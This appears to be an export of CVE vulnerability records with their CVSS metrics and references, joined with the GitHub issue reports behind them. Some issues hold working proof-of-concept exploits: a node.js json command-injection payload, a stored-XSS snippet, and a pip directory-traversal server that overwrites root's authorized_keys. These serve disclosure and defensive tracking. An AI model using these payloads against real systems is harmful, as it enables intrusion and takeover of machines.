}, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:joyent:json:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "E0DD27F0-787A-4CF4-84E6-2821C3101875", "versionEndExcluding": "10.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:commerce_guided_search:11.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "2A3622F5-5976-4BBC-A147-FC8A6431EA79", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_crime_and_compliance_management_studio:8.0.8.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "55F091C7-0869-4FD6-AC73-DA697D990304", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_crime_and_compliance_management_studio:8.0.8.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D134C60-F9E2-46C2-8466-DB90AD98439E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_regulatory_reporting_with_agilereporter:8.0.9.6.3:*:*:*:*:*:*:*", "matchCriteriaId": "DB3CDBAC-DAF0-4EB1-8FF1-3FB146A79498", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:timesten_in-memory_database:*:*:*:*:*:*:*:*", "matchCriteriaId": "20290BBC-E3C9-4B96-94FE-2DFADD4BF1F1", "versionEndExcluding": "21.1.1.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/trentm/json/issues/144
[ "Exploit", "Third Party Advisory" ]
github.com
[ "trentm", "json" ]
## POC ```js const json = require('json'); res = json.parseLookup('{[this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()]:1}'); console.log(res); ```
Command Injection
https://api.github.com/repos/trentm/json/issues/144/comments
2
2020-08-06T07:10:51Z
2020-08-28T22:52:35Z
https://github.com/trentm/json/issues/144
674,077,621
144
1,413
CVE-2020-23836
2020-09-01T17:15:12.230
A Cross-Site Request Forgery (CSRF) vulnerability in edit_user.php in OSWAPP Warehouse Inventory System (aka OSWA-INV) through 2020-08-10 allows remote attackers to change the admin's password after an authenticated admin visits a third-party site.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/siamon123/warehouse-inventory-system/issues/55" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.exploit-db.com/exploits/48738" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/siamon123/warehouse-inventory-system/issues/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.exploit-db.com/exploits/48738" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oswapp:warehouse_inventory_system:*:*:*:*:*:*:*:*", "matchCriteriaId": "21BCA31C-3CA2-4A59-AA14-7F08F7A999CD", "versionEndExcluding": null, "versionEndIncluding": "2020-08-10", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/siamon123/warehouse-inventory-system/issues/55
[ "Third Party Advisory" ]
github.com
[ "siamon123", "warehouse-inventory-system" ]
Cross-Site Request Forgery (CSRF) on `edit_user.php` page allows changing the admin password from a 3rd party site. For fix see: https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html
CSRF Change Admin Password
https://api.github.com/repos/siamon123/warehouse-inventory-system/issues/55/comments
0
2020-08-10T05:11:52Z
2020-08-10T05:11:52Z
https://github.com/siamon123/warehouse-inventory-system/issues/55
675,867,337
55
1,414
CVE-2020-23839
2020-09-01T17:15:12.310
A Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16, in the admin/index.php login portal webpage, allows remote attackers to execute JavaScript code in the client's browser and harvest login credentials after a client clicks a link, enters credentials, and submits the login form.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162016/GetSimple-CMS-3.3.16-Cross-Site-Scripting-Shell-Upload.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1330" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/boku7/CVE-2020-23839" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/49726" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162016/GetSimple-CMS-3.3.16-Cross-Site-Scripting-Shell-Upload.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1330" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/boku7/CVE-2020-23839" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/49726" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:get-simple:getsimple_cms:3.3.16:*:*:*:*:*:*:*", "matchCriteriaId": "30554CDA-8A09-4632-8857-0CA48F3B2B3E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1330
[ "Exploit", "Third Party Advisory" ]
github.com
[ "GetSimpleCMS", "GetSimpleCMS" ]
Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' login portal webpage allows remote attackers to execute JavaScript code in the clients browser & harvest login credentials via client clicking a link, entering credentials, and submitting login form.
Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php'
https://api.github.com/repos/GetSimpleCMS/GetSimpleCMS/issues/1330/comments
9
2020-08-12T20:38:56Z
2021-01-20T20:35:15Z
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1330
677,963,854
1,330
1,415
CVE-2020-23814
2020-09-03T17:15:11.097
Multiple cross-site scripting (XSS) vulnerabilities in xxl-job v2.2.0 allow remote attackers to inject arbitrary web script or HTML via (1) AppName and (2)AddressList parameter in JobGroupController.java file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/1866" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.ccsq8.com/issues.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xuxueli/xxl-job/issues/1866" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.ccsq8.com/issues.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C7AE69F1-6781-47B8-933D-989F4EF5ED19", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/xuxueli/xxl-job/issues/1866
[ "Exploit", "Third Party Advisory" ]
github.com
[ "xuxueli", "xxl-job" ]
Locate the executor management function: https://github.com/xuxueli/xxl-job/blob/289f02185b952f4652a4a7daf4ac3c6384f338bc/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobGroupController.java insert POC there has front-end validation,By code audit, I find that the back end only has length validation.Can be bypassed by Burp Intercept. POC:<img/src=# onerror="alert(1)"/> ![image](https://user-images.githubusercontent.com/11627654/88906630-3e412d00-d28a-11ea-8240-a1c4b679a453.png) The code directly gets AppName and manually entered parameters for front-end display.No filtering or encoding .Causes storage XSS vulnerabilities. ![image](https://user-images.githubusercontent.com/11627654/88906662-47ca9500-d28a-11ea-87a9-4fa0f9dd46a5.png) The page automatically loads and triggers XSS every 60 seconds. ![image](https://user-images.githubusercontent.com/11627654/88906721-5b75fb80-d28a-11ea-81ce-485883386edd.png) ![image](https://user-images.githubusercontent.com/11627654/88906736-5f098280-d28a-11ea-975a-3076f861f116.png)
v2.2.0 Stored XSS vulnerabilities
https://api.github.com/repos/xuxueli/xxl-job/issues/1866/comments
5
2020-07-30T09:30:54Z
2021-02-16T15:18:29Z
https://github.com/xuxueli/xxl-job/issues/1866
668,541,948
1,866
1,416
CVE-2019-20916
2020-09-04T20:15:11.013
The pip package before 19.2 for Python allows Directory Traversal when a URL is given in an install command, because a Content-Disposition header can have ../ in a filename, as demonstrated by overwriting the /root/.ssh/authorized_keys file. This occurs in _download_http_url in _internal/download.py.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00005.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00010.html" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/gzpan123/pip/commit/a4c735b14a62f9cb864533808ac63936704f2ace" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/pypa/pip/compare/19.1.1...19.2" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch" ], "url": "https://github.com/pypa/pip/issues/6413" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00010.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00005.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00010.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/gzpan123/pip/commit/a4c735b14a62f9cb864533808ac63936704f2ace" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/pypa/pip/compare/19.1.1...19.2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch" ], "url": "https://github.com/pypa/pip/issues/6413" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00010.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pypa:pip:*:*:*:*:*:*:*:*", "matchCriteriaId": "903FF43B-79F2-4F2A-BC24-12D52398B309", "versionEndExcluding": "19.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", "matchCriteriaId": "B009C22E-30A4-4288-BCF6-C3E81DEAF45A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:1.10.0:*:*:*:*:*:*:*", "matchCriteriaId": "C2A5B24D-BDF2-423C-98EA-A40778C01A05", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:22.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "04E6C8E9-2024-496C-9BFD-4548A5B44E2E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.15.0:*:*:*:*:*:*:*", "matchCriteriaId": "B4367D9B-BF81-47AD-A840-AC46317C774D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/pypa/pip/issues/6413
[ "Exploit", "Patch" ]
github.com
[ "pypa", "pip" ]
**Environment** * pip version: pip 19.0.3 * Python version: Python 2.7.15 / Python 2.7.15 * OS: Ubuntu 16.04 / Windows 10 **Description** This is a security vulnerability. when installing a remote package via a specified URL "pip install \<url\>", A malicious server (or a network MitM if downloading over HTTP) can send a Content-Disposition header with filename which contains "../", and pip did not sanitize the filename, join the Temporary directory and the filename as download path, which can write arbitrary file, potentially leading to command execution. issue occurs in _download_http_url in src/pip/_internal/download.py **poc:** for linux, pip usually requires root privileges, we can write following files to get root shell: /root/.ssh/authorized_keys /etc/crontab for windows, we can write a batch file to the user startup dir, lead to command execution on next boot: C:\Users\<User>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ for malicious header: ``` from django.http import HttpResponse def linux(request): response = HttpResponse("malicious public key\n") filename = "../../../../../root/.ssh/authorized_keys" response['Content-Type'] = 'RANDOM' # avoid mimetypes.guess_extension guess ext response['Content-Disposition'] = 'attachment;filename="{0}"'.format(filename) return response ``` pip install malicious url result: ``` root@DESKTOP-FRESH:~# pip install http://192.168.40.16/linux Looking in indexes: https://mirrors.aliyun.com/pypi/simple/ Collecting http://192.168.40.16/linux Downloading http://192.168.40.16/linux Cannot unpack file /root/.ssh/authorized_keys (downloaded from /tmp/pip-req-build-UAVkjW, content-type: RANDOM); cannot detect archive format Cannot determine archive format of /tmp/pip-req-build-UAVkjW root@DESKTOP-FRESH:~# cat /root/.ssh/authorized_keys malicious public key root@DESKTOP-FRESH:~# ``` **similar issue:** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9686
pip install <url> allow directory traversal, leading to arbitrary file write
https://api.github.com/repos/pypa/pip/issues/6413/comments
1
2019-04-16T17:23:55Z
2019-07-11T08:57:21Z
https://github.com/pypa/pip/issues/6413
433,898,163
6,413
1,417
CVE-2020-24566
2020-09-09T16:15:11.923
In Octopus Deploy 2020.3.x before 2020.3.4 and 2020.4.x before 2020.4.1, if an authenticated user creates a deployment or runbook process using Azure steps and sets the step's execution location to run on the server/worker, then (under certain circumstances) the account password is exposed in cleartext in the verbose task logs output.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6563" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6564" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6563" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6564" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*", "matchCriteriaId": "BBE2EA3F-968A-4528-A3C3-0FE92A4DB9DE", "versionEndExcluding": "2020.3.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2020.3", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "532" ]
532
https://github.com/OctopusDeploy/Issues/issues/6563
[ "Third Party Advisory" ]
github.com
[ "OctopusDeploy", "Issues" ]
## Description <!-- Take the time to figure out a description for disclosure which gives customers enough detail to understand if they will be affected or not, without disclosing how to exploit the vulnerability to bad actors. --> A regression was introduced that caused certain passwords to be written to the deployment log without being masked. This only affects deployment processes that ran steps on the server/worker (not on targets). ## Affected versions <!-- Which versions of Octopus Server, or other software are affected by this problem? A range is usually helpful if you can figure it out. --> **Octopus Server: 2020.3.0 - 2020.3.3** ## Links CVE: [CVE-2020-24566](https://nvd.nist.gov/vuln/detail/CVE-2020-24566) Internal issue: https://github.com/OctopusDeploy/OctopusDeploy/issues/6753 PR: https://github.com/OctopusDeploy/OctopusDeploy/pull/6749
Passwords written to deployment log in plain-text
https://api.github.com/repos/OctopusDeploy/Issues/issues/6563/comments
1
2020-09-08T03:28:35Z
2020-09-10T06:08:43Z
https://github.com/OctopusDeploy/Issues/issues/6563
695,516,197
6,563
1,418
CVE-2020-24566
2020-09-09T16:15:11.923
In Octopus Deploy 2020.3.x before 2020.3.4 and 2020.4.x before 2020.4.1, if an authenticated user creates a deployment or runbook process using Azure steps and sets the step's execution location to run on the server/worker, then (under certain circumstances) the account password is exposed in cleartext in the verbose task logs output.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6563" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6564" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6563" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OctopusDeploy/Issues/issues/6564" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:octopus:octopus_deploy:*:*:*:*:*:*:*:*", "matchCriteriaId": "BBE2EA3F-968A-4528-A3C3-0FE92A4DB9DE", "versionEndExcluding": "2020.3.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2020.3", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "532" ]
532
https://github.com/OctopusDeploy/Issues/issues/6564
[ "Third Party Advisory" ]
github.com
[ "OctopusDeploy", "Issues" ]
#6563 also affected `2020.3`. The fix has been shipped in the patch indicated by the milestone. If you are using `2020.3` we highly recommend applying this patch. Learn about [Releases of Octopus Deploy Server](https://g.octopushq.com/longtermsupport).
Passwords written to deployment log in plain-text
https://api.github.com/repos/OctopusDeploy/Issues/issues/6564/comments
1
2020-09-08T03:44:23Z
2020-09-10T06:08:53Z
https://github.com/OctopusDeploy/Issues/issues/6564
695,521,561
6,564
1,419
CVE-2020-25219
2020-09-09T21:15:11.117
url::recvline in url.cpp in libproxy 0.4.x through 0.4.15 allows a remote HTTP server to trigger uncontrolled recursion via a response composed of an infinite stream that lacks a newline character. This leads to stack exhaustion.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
